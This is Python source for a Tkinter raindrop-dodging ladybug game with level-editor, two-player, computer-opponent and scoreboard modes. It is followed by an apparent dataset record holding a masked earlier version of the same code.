if data.enterX-data.r<=event.y<=data.enterX+data.r:
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.mode="levelCreated"
def drawButtons(canvas, data):
#makes each button
data.font, data.fill = "Helvetica 13 bold", "yellow"
canvas.create_text(data.medX,data.YST, text= "Your Speed:",
font = data.font,fill =data.fill)
canvas.create_image(data.easyX,data.easyY, image = data.slow)
canvas.create_text(data.easyX,data.easyY, text="Slow", font = data.font)
canvas.create_image(data.medX,data.easyY, image = data.medium)
canvas.create_text(data.medX,data.easyY, text="Medium", font = data.font)
canvas.create_image(data.hardX,data.easyY, image = data.fast)
canvas.create_text(data.hardX,data.easyY, text="Fast",font = data.font)
canvas.create_image(data.easyX,data.medX, image = data.drizzle)
canvas.create_text(data.medX,data.RST, text= "Rain Speed:",
font = data.font,fill =data.fill)
canvas.create_text(data.easyX,data.medX, text="Drizzle",font = data.font)
canvas.create_image(data.medX,data.medX, image = data.rain)
canvas.create_text(data.medX,data.medX, text="Rain",font = data.font)
canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)
canvas.create_text(data.hardX,data.medX, text="Heavy",font = data.font)
canvas.create_text(data.medX,data.PUT, text= "PowerUps?",
font = data.font,fill =data.fill)
canvas.create_image(data.easyY,data.last, image = data.yes)
canvas.create_text(data.easyY,data.last, text="Yes",font = data.font)
canvas.create_image(data.last,data.last, image = data.no)
canvas.create_text(data.last,data.last, text="No",font = data.font)
changeEnter(canvas, data)
def changeEnter(canvas, data):
#makes it so the enter button respond to click
if data.powerUpsEditor != None and data.yourSpeed != None and \
data.rainSpeed != None: data.enter = data.click
canvas.create_image(data.medX,data.enterX, image = data.enter)
canvas.create_text(data.medX,data.enterX, text="Enter",font = data.font)
def editorTimerFired(data):
data.editorTime += 1
if data.editorTime %2 ==0:
rainDrop(data)
for drop in data.editorDrops:
drop.onTimerFired(data)
def rainDrop(data):
#background drops
xPosition = random.randint(0,data.width)
data.editorDrops.append(Coconuts(xPosition,0))
def editorRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.height/2, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
canvas.create_text(data.width/2, data.S_P -10, text = "Edit Your Level!",
font="Arial 23 bold", fill = "yellow")
drawButtons(canvas, data)
drawHome(canvas, data)
####################################
# levelCreated mode
####################################
def setEverything(data):
#customizing game
if data.yourSpeed == "slow": data.speed = 6
elif data.yourSpeed == "medium": data.speed = 10
elif data.yourSpeed == "fast": data.speed = 14
if data.rainSpeed == "thunderstorm": data.rSpeed = 7
elif data.rainSpeed == "rain": data.rSpeed = 10
elif data.rainSpeed == "drizzle": data.rSpeed = 13
def levelCoconutShot(data):
#adding drops
if data.levelEditorLives >0:
if data.time%int(0.35*data.rSpeed) == 0:
xPosition1 = random.randint(0,data.Player1Min-data.buffer)
xPosition2 = random.randint(770, 870)
xPosition3 = random.randint(220,770)
data.coconuts.append(Coconuts(xPosition3,0))
data.coconuts.append(Coconuts(xPosition1,0))
data.coconuts.append(Coconuts(xPosition2,0))
if data.time % int(0.55*data.rSpeed) ==0:
xPosition3 = random.randint(0, 220)
xPosition5 = random.randint(220,770)
data.coconuts.append(Coconuts(xPosition3,0))
data.coconuts.append(Coconuts(xPosition5,0))
if data.time % int(data.rSpeed) ==0:
side = random.choice(data.sides)
if side == "l":
data.coconuts.append(Coconuts(3*data.width/8-20,0))
elif side =="r":
data.coconuts.append(Coconuts(7*data.width/8+40,0))
xPosition4= random.randint(220,770)
data.coconuts.append(Coconuts(xPosition4,0))
levelPowerUp(data)
def levelPowerUp(data):
# adding power-ups only if clicked yes
if data.powerUpsEditor == True:
if data.time % 20 == 0 and data.time%40 !=0:
Position = random.choice(data.spotList)
data.powerUps.append(PowerUps(Position,0))
if data.time%30 == 0:
Position = random.choice(data.spotList)
data.invincible.append(Invincible(Position,0))
if data.time %35==0:
Position = random.choice(data.spotList)
data.scaryBug.append(ScaryBug(Position,750))
def levelCreatedKeyPressed(event,data):
if event.keysym == "r": init(data)
if data.levelEditorLives>0:
if (event.keysym == "Left") and data.cx>=317:
data.cx -=(data.lane/2)
elif(event.keysym == "Right") and data.cx<=740:
data.cx +=(data.lane/2)
def levelCreatedMousePressed(event, data):
checkHome(event, data)
def levelCreatedTimerFired(data):
setEverything(data)
if data.levelEditorLives>0:
data.cy-=data.speed
if data.cy < 15:
data.level +=1
if data.cy>40:
data.time +=1
if data.pauseDrops !=True: levelCoconutShot(data)
if data.powerUpsEditor == False:
for coconut in data.coconuts: coconut.onTimerFired(data)
hit(data)
if data.powerUpsEditor == True:
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
for powerUp in data.invincible: powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug: bug.onTimerFired(data)
hitScaryBug(data)
for coconut in data.coconuts:
if data.pauseDrops == False:coconut.onTimerFired(data)
if data.beInvincible == False: hit(data)
if data.start != None:
#to make powerups only active for set amount of time
if abs(data.start-data.cy) >= 120:
data.pauseDrops, data.beInvincible = False, False
def levelCreatedRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconuts: coconut.draw(canvas)
if data.powerUpsEditor == True: drawPowerups(canvas, data)
canvas.create_image(data.cx, data.cy, image=data.ladyBug)
canvas.create_text(data.width/6,100,
text ="Total Lives: %d" %data.levelEditorLives,
font = "Arial 20 bold", fill = "yellow")
canvas.create_text(data.width/2,660,
text ="""You lose a life for hitting a drop
& don't get eaten!""",
font = "Arial 15 bold", fill = "yellow")
if data.levelEditorLives <=0:
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)
canvas.create_text(data.width/2,data.height/4,
text = "You Lose! Better Luck Next Time!",
font = "Helvetica 23 bold", fill = "yellow")
if data.level > 1: winEditor(canvas, data)
drawHome(canvas, data)
def winEditor(canvas, data):
#screen for when you win
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# AI Difficulty Mode
####################################
def difficultyKeyPressed(event,data):
if event.keysym == "r": init(data)
def drawDifficulties(canvas, data):
canvas.create_text(data.medX,data.AITY, text= "Computer Difficulty:",
font="Arial 23 bold", fill = "yellow")
canvas.create_image(data.easyX, data.easyY, image=data.slow)
canvas.create_text(data.easyX,data.easyY, text="Easy")
canvas.create_image(data.medX, data.easyY, image=data.medium)
canvas.create_text(data.medX,data.easyY, text="Medium")
canvas.create_image(data.hardX, data.easyY, image=data.fast)
canvas.create_text(data.hardX,data.easyY, text="Hard")
if data.difficulty !=None:
data.enter = data.click
canvas.create_image(data.medX, data.enterY, image=data.enter)
canvas.create_text(data.medX,data.enterY, text="Enter")
def difficultyMousePressed(event, data):
#sets up buttons to customize
checkHome(event, data)
if data.easyY-data.r<= event.y <= data.easyY +data.r:
if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:
data.difficulty = data.difS
data.slow = data.click
data.medium, data.fast = data.notClick, data.notClick
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.difficulty = data.difM
data.medium = data.click
data.slow, data.fast = data.notClick, data.notClick
if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:
data.difficulty = data.difH
data.fast = data.click
data.slow, data.medium = data.notClick, data.notClick
if data.enter == data.click:
if data.enterY-data.r<=event.y<=data.enterY+data.r:
if data.medX-2*data.r<= event.x<=data.medX+2*data.r:
data.mode="AI"
def difficultyTimerFired(data):
# makes normal background rain
data.editorTime += 1
if data.editorTime %2 ==0:
rainDrop(data)
for drop in data.editorDrops:
drop.onTimerFired(data)
def rainDrop(data):
xPosition = random.randint(0,data.width)
data.editorDrops.append(Coconuts(xPosition,0))
def difficultyRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.height/2, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
drawDifficulties(canvas, data)
drawHome(canvas, data)
####################################
# AI mode
####################################
def hitAI1(data, distance):
for coconut in data.coconutsAI1:
# so AI switches by itself
if (data.player1Y-data.r - coconut.y<=distance) and \
data.switchOnProgress == False:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:
testInt = random.randint(0,9)
# to have different levels of difficulty
if testInt<= data.difficulty:
data.switchOnProgress= True
if data.player1X == 150:
data.player1X = 340
else:
data.player1X = 150
data.switchOnProgress= False
if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:
if coconut.x>=data.player1X-data.r and \
coconut.x<=data.player1X+data.r:
data.player1Y+=50
data.coconutsAI1.remove(coconut)
def AISwitchBug(data, distance):
#AI to move for spider
for scaryBug in data.scaryBug:
if (data.player1Y-data.r - scaryBug.y<=distance) and \
data.switchOnProgress == False:
if scaryBug.x>=data.player1X-data.r and \
scaryBug.x<=data.player1X+data.r:
return True
def hitAI2(data, distance):
# check if human controlled player hits drops
for coconut in data.coconutsAI2:
if coconut.y>=data.player2Y-data.r and coconut.y<=data.player2Y+data.r:
if coconut.x>=data.player2X-data.r and \
coconut.x<=data.player2X+data.r:
data.player2Y+=50
data.coconutsAI2.remove(coconut)
def coconutShotAI(data):
if data.winner ==None:
# randomize position of drops off of tree
if data.time%15==0:
xPosition1 = random.randint(0,385)
if abs(xPosition1 - 100)>40 and abs(xPosition1 - 360)>40:
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(xPosition1,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(xPosition1 +410,0))
if data.time%8 ==0:
xPosition2 = random.randint(0,80)
xPosition3 = random.randint(364, 385)
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(xPosition2,0))
data.coconutsAI1.append(Coconuts(xPosition3,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(xPosition2+410,0))
data.coconutsAI2.append(Coconuts(xPosition3+410,0))
addExtraCoconut(data)
addPowerUpsAI(data)
def addExtraCoconut(data):
#adds drops to edges of trees
if data.time % (18) ==0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(140,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(540,0))
elif side =="r":
if data.pause1Drop != True:
data.coconutsAI1.append(Coconuts(344,0))
if data.pause2Drop != True:
data.coconutsAI2.append(Coconuts(755,0))
if data.time % 37 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.powerUps.append(PowerUps(140,0))
if data.pause2Drop != True:
data.powerUps.append(PowerUps(550,0))
elif side =="r":
if data.pause1Drop != True:
data.powerUps.append(PowerUps(344,0))
if data.pause2Drop != True:
data.powerUps.append(PowerUps(755,0))
def addPowerUpsAI(data):
#randomly add powerups on tree
if data.time%33 == 0:
side = random.choice(data.sides)
if side == "l":
if data.pause1Drop != True:
data.invincible.append(Invincible(140,0))
if data.pause2Drop != True:
data.invincible.append(Invincible(550,0))
elif side =="r":
if data.pause1Drop != True:
data.invincible.append(Invincible(344,0))
if data.pause2Drop != True:
data.invincible.append(Invincible(755,0))
if data.time %66==0:
side = random.choice(data.sides)
if side == "l":
data.scaryBug.append(ScaryBug(140,750))
data.scaryBug.append(ScaryBug(550,750))
elif side =="r":
data.scaryBug.append(ScaryBug(344,750))
data.scaryBug.append(ScaryBug(750,750))
def AIKeyPressed(event,data):
if event.keysym == "r": init(data)
if data.winner==None:
if (event.keysym == "Left") and data.onLeft1==False:
data.onLeft1 = True
data.player2X = 550
elif(event.keysym == "Right") and data.onLeft1== True:
data.onLeft1 = False
data.player2X = 750
def AIMousePressed(event, data): checkHome(event, data)
def AITimerFired(data):
if data.winner == None:
#want to check hit twice (before & after elements move)
if data.Invincible1 == False:hitAI1(data, 31)
if data.Invincible2 == True: pass
elif data.Invincible2 == False:hitAI2(data, 31)
for coconut in data.coconutsAI1:
if data.pause1Drop == False:coconut.onTimerFired(data)
for coconut in data.coconutsAI2:
if data.pause2Drop == False:coconut.onTimerFired(data)
# second check
if data.Invincible1 == False:hitAI1(data,13)
if data.Invincible2 == True:pass
elif data.Invincible2 == False:hitAI2(data,13)
data.player1Y-=data.speedAI
#establishing winer
if data.player1Y < 15 and data.player2Y >15: data.winner= "player1"
if data.player1Y>40:
data.time +=1
coconutShotAI(data)
data.player2Y-=data.speedAI
if data.player2Y < 15 and data.player1Y> 15: data.winner= "player2"
if data.player2Y>40:
data.time +=1
coconutShotAI(data)
if data.player1Y < 15 and data.player2Y <15: data.winner = "tie"
for powerUp in data.powerUps: powerUp.onTimerFired(data)
hitPause(data)
powerUpAITimerFired(data)
def powerUpAITimerFired(data):
#moves both sides symmetrically
for powerUp in data.invincible:
powerUp.onTimerFired(data)
hitInvincible(data)
for bug in data.scaryBug:
bug.onTimerFired(data)
hitScaryBug(data)
if data.start1 != None:
if abs(data.start1-data.player1Y) >= 120:
data.pause1Drop = False
data.Invincible1 = False
if data.start2 != None:
if abs(data.start2-data.player2Y) >= 120:
data.pause2Drop = False
data.Invincible2 = False
def AIRedrawAll(canvas, data):
canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)
canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)
canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)
canvas.create_line(0,20, data.width, 20)
for coconut in data.coconutsAI1:
coconut.draw(canvas)
for coconut in data.coconutsAI2:
coconut.draw(canvas)
canvas.create_text(50,40, text = "Computer",font = "Arial 15 bold",
fill = "yellow")
canvas.create_text(450,40, text = "Player 1",font = "Arial 15 bold",
fill = "yellow")
drawPowerups(canvas, data)
canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)
canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)
AIWinner(canvas, data)
drawHome(canvas, data)
def AIWinner(canvas, data):
if data.winner== "player1":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "The Computer Won :(",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "player2":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "You Made it! You Won!",
font = "Arial 23 bold", fill = "yellow")
elif data.winner== "tie":
canvas.create_rectangle(0,0, data.width, data.height, fill = "black")
canvas.create_image(data.width/2, data.height/2, image=data.winScreen)
canvas.create_image(300, 320, image=data.winBug)
canvas.create_text(data.width/2,100, text = "Tie! You Both Made it!",
font = "Arial 23 bold", fill = "yellow")
####################################
# ScoreBoard mode
####################################
def scoreboardKeyPressed(event, data):
if event.keysym == "r": init(data)
def scoreboardMousePressed(event, data): checkHome(event, data)
def scoreboardTimerFired(data):
difficultyTimerFired(data)
def scoreboardRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.height/2, image=data.background)
canvas.create_image(data.width/2, data.tbgY, image=data.tbg)
for drop in data.editorDrops:
drop.draw(canvas)
canvas.create_text(data.width/2, data.txtTScore, text="Top Scores!",
font = "Arial 30 bold", fill = "yellow")
canvas.create_text(data.width/2, data.S_P, text="Score_Player",
font = "Arial 20 bold", fill = "yellow")
drawHome(canvas, data)
#reads file
data.savedScores
data.savedScores=readFile("score.txt")
score=data.savedScores.splitlines()
scores=[]
for line in score:
scores.append(line.split(","))
#sorts scores to find top 5
scores = sorted(scores, key = lambda x: int(x[0]))
top5 = scores[-data.numScores:]
top5.reverse()
for i in range(len(top5)):
canvas.create_text(data.width/2, data.scoreShift+(i*50),
text = top5[i],
font = "Arial 18 bold", fill = "yellow")
####################################
# help mode
####################################
def helpKeyPressed(event, data):
if event.keysym == "r": init(data)
def helpMousePressed(event, data): checkHome(event, data)
def helpTimerFired(data):
difficultyTimerFired(data)
def helpRedrawAll(canvas, data):
canvas.create_image(data.width/2, data.helpY, image=data.helpScreen)
for drop in data.editorDrops:
drop.draw(canvas)
drawHome(canvas, data)
#######################################
# use the run function as-is from notes
#######################################
def run(width=15000, height=25000):
def redrawAllWrapper(canvas, data):
canvas.delete(ALL)
redrawAll(canvas, data)
canvas.update()
def mousePressedWrapper(event, canvas, data):
mousePressed(event, data)
redrawAllWrapper(canvas, data)
def keyPressedWrapper(event, canvas, data):
keyPressed(event, data)
redrawAllWrapper(canvas, data)
def timerFiredWrapper(canvas, data):
timerFired(data)
redrawAllWrapper(canvas, data)
# pause, then call timerFired again
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)
# Set up data and call init
class Struct(object): pass
data = Struct()
data.width = width
data.height = height
data.timerDelay = 100 # milliseconds
# create the root and the canvas
root = Tk()
init(data)
canvas = Canvas(root, width=data.width, height=data.height)
canvas.pack()
# set up events
root.bind("<Button-1>", lambda event:
mousePressedWrapper(event, canvas, data))
root.bind("<Key>", lambda event:
keyPressedWrapper(event, canvas, data))
timerFiredWrapper(canvas, data)
# and launch the app
root.mainloop() # blocks until window is closed
print("bye!")
run(1000, 1000)
|
normal
|
{
"blob_id": "c893095be88636e6cb06eb3b939d8106fbb7a8ca",
"index": 470,
"step-1": "<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\n<mask token>\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\n<mask token>\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\n<mask token>\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\n<mask token>\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n 